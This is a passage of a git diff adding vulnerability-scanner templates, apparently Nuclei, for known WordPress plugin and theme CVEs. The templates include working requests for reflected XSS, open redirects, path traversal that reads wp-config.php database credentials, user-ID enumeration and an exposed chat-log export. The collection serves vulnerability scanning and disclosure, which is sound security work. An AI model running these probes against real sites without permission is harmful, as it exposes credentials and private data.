cvss-score: 6.10 + cve-id: CVE-2021-24210 + cwe-id: CWE-601 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header diff --git a/poc/cve/CVE-2021-24291-5683.yaml b/poc/cve/CVE-2021-24291-5683.yaml new file mode 100644 index 0000000000..d5501bff21 --- /dev/null +++ b/poc/cve/CVE-2021-24291-5683.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-24291 + +info: + name: Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS) + author: geeknik + description: The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users) + reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a + severity: medium + tags: cve,cve2021,xss,wordpress,wp-plugin,photo + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24291 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + words: + - "onmouseover=alert(document.domain)//" + - "wp-content/uploads/photo-gallery" + condition: and diff --git a/poc/cve/CVE-2021-24316-5691.yaml b/poc/cve/CVE-2021-24316-5691.yaml new file mode 100644 index 0000000000..9d76374f71 --- /dev/null +++ b/poc/cve/CVE-2021-24316-5691.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-24316 + +info: + author: 0x_Akoko + description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS. + name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress + severity: medium + tags: cve,cve2021,mediumish,xss,wordpress + reference: + - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e + - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24316 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E ' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + - "Sorry, no posts matched your criteria." + part: body + condition: and + + - type: word + words: + - "text/html" + part: header diff --git a/poc/cve/CVE-2021-24387-5724.yaml b/poc/cve/CVE-2021-24387-5724.yaml new file mode 100644 index 0000000000..69a9632897 --- /dev/null +++ b/poc/cve/CVE-2021-24387-5724.yaml @@ -0,0 +1,42 @@ +id: CVE-2021-24387 + +info: + name: Real Estate 7 WordPress Theme < 3.1.1 - Unauthenticated Reflected XSS + author: suman_kar + severity: medium + description: | + The WP Pro Real Estate 7 WordPress theme before 3.1.1 did not properly sanitise the ct_community parameter + in its search listing page before outputting it back in it, leading to a reflected Cross-Site Scripting which + can be triggered in both unauthenticated or authenticated user context + reference: + - https://cxsecurity.com/issue/WLB-2021070041 + - https://wpscan.com/vulnerability/27264f30-71d5-4d2b-8f36-4009a2be6745 + - https://contempothemes.com/wp-real-estate-7/changelog/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24387 + cwe-id: CWE-79 + tags: cve,cve2021,xss,wordpress + +requests: + - raw: + - | + GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + Connection: close + + matchers-condition: and + matchers: + - type: word + words: + - '' + - '/wp-content/themes/realestate' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2021-24406-5736.yaml b/poc/cve/CVE-2021-24406-5736.yaml new file mode 100644 index 0000000000..e9962f0eb1 --- /dev/null +++ b/poc/cve/CVE-2021-24406-5736.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-24406 + +info: + name: WordPress wpForo Forum < 1.9.7 - Open Redirect + author: 0x_Akoko + severity: medium + description: WordPress wpForo Forum < 1.9.7 is susceptible to an open redirect vulnerability because the plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect + issue after a successful login. + reference: + - https://wpscan.com/vulnerability/a9284931-555b-4c96-86a3-09e1040b0388 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24406 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24406 + cwe-id: CWE-601 + tags: wordpress,redirect,cve,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + part: header + +# Enhanced by mp on 2022/04/13 diff --git a/poc/cve/CVE-2021-24488(1).yaml b/poc/cve/CVE-2021-24488(1).yaml new file mode 100644 index 0000000000..227a6f412a --- /dev/null +++ b/poc/cve/CVE-2021-24488(1).yaml @@ -0,0 +1,45 @@ +id: CVE-2021-24488 + +info: + name: WordPress Plugin Post Grid < 2.1.8 - XSS + author: cckuailong + severity: medium + description: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues + reference: + - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a + - https://nvd.nist.gov/vuln/detail/CVE-2021-24488 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24488 + cwe-id: CWE-79 + tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'value="\"onmouseover=alert(document.domain)/">' + - 'Post Grid' + condition: and + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2021-24997-5782.yaml b/poc/cve/CVE-2021-24997-5782.yaml new file mode 100644 index 0000000000..8f90e6b2d1 --- /dev/null +++ b/poc/cve/CVE-2021-24997-5782.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-24997 + +info: + name: Wordpress Guppy <=1.1 - User ID Disclosure + author: Evan Rubinstein + severity: medium + description: Instances of the Guppy Wordpress extension up to 1.1 are vulnerable to an API disclosure vulnerability which allows remote unauthenticated attackrs to obtain all user IDs, and then use that information to make API requests to either get messages sent between users, or send messages posing as one user to another. + reference: + - https://www.exploit-db.com/exploits/50540 + - https://patchstack.com/database/vulnerability/wp-guppy/wordpress-wp-guppy-plugin-1-2-sensitive-information-disclosure-vulnerability + - https://nvd.nist.gov/vuln/detail/CVE-2021-24997 + - https://wpscan.com/vulnerability/747e6c7e-a167-4d82-b6e6-9e8613f0e900 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2021-24997 + cwe-id: CWE-862 + tags: wordpress,guppy,api,cve2021,cve,wp-plugin,edb,wpscan + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '"guppyUsers":' + - '"userId":' + - '"type":' + condition: and diff --git a/poc/cve/CVE-2021-25028-5787.yaml b/poc/cve/CVE-2021-25028-5787.yaml new file mode 100644 index 0000000000..f056174b62 --- /dev/null +++ b/poc/cve/CVE-2021-25028-5787.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-25028 + +info: + name: Event Tickets < 5.2.2 - Open Redirect + author: 0x_Akoko + severity: medium + description: The plugin does not validate the tribe_tickets_redirect_to parameter before redirecting the user to the given value, leading to an arbitrary redirect issue + reference: + - https://wpscan.com/vulnerability/80b0682e-2c3b-441b-9628-6462368e5fc7 + - https://www.cvedetails.com/cve/CVE-2021-25028 + tags: cve,cve2021,redirect,wordpress + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-25028 + cwe-id: CWE-601 + +requests: + - method: GET + + path: + - '{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com' + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header diff --git a/poc/cve/CVE-2021-39312-6327.yaml b/poc/cve/CVE-2021-39312-6327.yaml new file mode 100644 index 0000000000..f9d8540c5f --- /dev/null +++ b/poc/cve/CVE-2021-39312-6327.yaml @@ -0,0 +1,52 @@ +id: CVE-2021-39312 + +info: + name: WordPress True Ranker <2.2.4 - Local File Inclusion + author: DhiyaneshDK + severity: high + description: WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion. + remediation: Fixed in version 2.2.4 + reference: + - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312 + - https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php + - https://nvd.nist.gov/vuln/detail/CVE-2021-39312 + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-39312 + cwe-id: CWE-22 + epss-score: 0.16864 + epss-percentile: 0.95927 + cpe: cpe:2.3:a:trueranker:true_ranker:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: trueranker + product: true_ranker + framework: wordpress + tags: cve,cve2021,unauth,lfr,wpscan,wp-plugin,lfi,wp,wordpress,trueranker + +http: + - raw: + - | + POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 +# digest: 490a00463044022031ccf1b4c1f46397810347618011728678183100da2fbf4e931582f3f08446bd02202f1d6f5de6611bfc1c9f47b014121e13f12ae3cca0a7027b1d8da7f438c96dbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-0653-6638.yaml b/poc/cve/CVE-2022-0653-6638.yaml new file mode 100644 index 0000000000..e06a6c604a --- /dev/null +++ b/poc/cve/CVE-2022-0653-6638.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-0653 + +info: + name: Wordpress Profile Builder Plugin Cross-Site Scripting + author: dhiyaneshDk + severity: medium + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653 + - https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/ + tags: cve,cve2022,wordpress,xss,wp-plugin + description: "The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.\n\n." + remediation: Upgrade to version 3.6.5 or later. + classification: + cve-id: CVE-2022-0653 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'here' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/28 diff --git a/poc/cve/CVE-2022-27849-6740.yaml b/poc/cve/CVE-2022-27849-6740.yaml new file mode 100644 index 0000000000..8aa1ca42b3 --- /dev/null +++ b/poc/cve/CVE-2022-27849-6740.yaml @@ -0,0 +1,58 @@ +id: CVE-2022-27849 + +info: + name: WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability + author: random-robbie + severity: high + description: | + WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as user credentials or private messages. + remediation: | + Update to the latest version of the WordPress Simple Ajax Chat plugin to fix the vulnerability. + reference: + - https://wordpress.org/plugins/simple-ajax-chat/#developers + - https://patchstack.com/database/vulnerability/simple-ajax-chat/wordpress-simple-ajax-chat-plugin-20220115-sensitive-information-disclosure-vulnerability + - https://nvd.nist.gov/vuln/detail/CVE-2022-27849 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-27849 + cwe-id: CWE-200 + epss-score: 0.00713 + epss-percentile: 0.80067 + cpe: cpe:2.3:a:plugin-planet:simple_ajax_chat:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: plugin-planet + product: simple_ajax_chat + framework: wordpress + google-query: inurl:/wp-content/plugins/simple-ajax-chat/ + tags: cve,cve2022,wp,wordpress,wp-plugin,disclosure,plugin-planet + +http: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"Chat Log"' + - '"User IP"' + - '"User ID"' + condition: and + + - type: word + part: header + words: + - text/csv + + - type: status + status: + - 200 +# digest: 490a0046304402200ac201e5da2db9585d76d187f6a6ede0350f1c6230c3c80676234cb41a9e8259022037d381d175e583e6490612c81f07c12a325a2dc7252ba6dcc9f5d27cc59d94d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file